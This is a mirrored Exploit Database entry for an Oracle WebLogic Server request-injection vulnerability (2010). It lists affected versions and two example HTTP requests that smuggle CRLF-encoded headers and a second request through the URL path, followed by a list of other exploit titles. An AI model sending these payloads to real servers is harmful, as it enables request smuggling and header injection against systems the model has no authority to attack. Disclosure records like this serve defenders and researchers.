Oracle WebLogic Server 10.3.3 – Encoded URL

Exploit Database
15 阅读

作者： Timothy D. Morgan

日期： 2010-07-13
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/34312/

source: https://www.securityfocus.com/bid/41620/info

Oracle WebLogic Server is prone to a remote vulnerability.

The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.

This vulnerability affects the following supported versions:
7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3 

The following example requests are available:

GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close

GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com

last Exploits
Oracle WebLogic Server 10.3.3 – Encoded URL的更多信息

ComSndFTP 1.3.7 Beta – USER Format String (Write4) (Metasploit)：
Cisco UCS Director – default scpuser password (Metasploit)：
Mongoose Web Server 2.11 – Directory Traversal：
Atlassian HipChat for Jira Plugin – Velocity Template Injection (Metasploit)：
Brekeke PBX 2.4.4.8 – ‘pbx/gate’ Cross-Site Request Forgery：
NUUO NVRMini2 3.8 – ‘cgi_system’ Buffer Overflow (Enable Telnet)：
SAP Router – Timing Attack Password Disclosure：
Lexmark MarkVision Enterprise – Arbitrary File Upload (Metasploit)：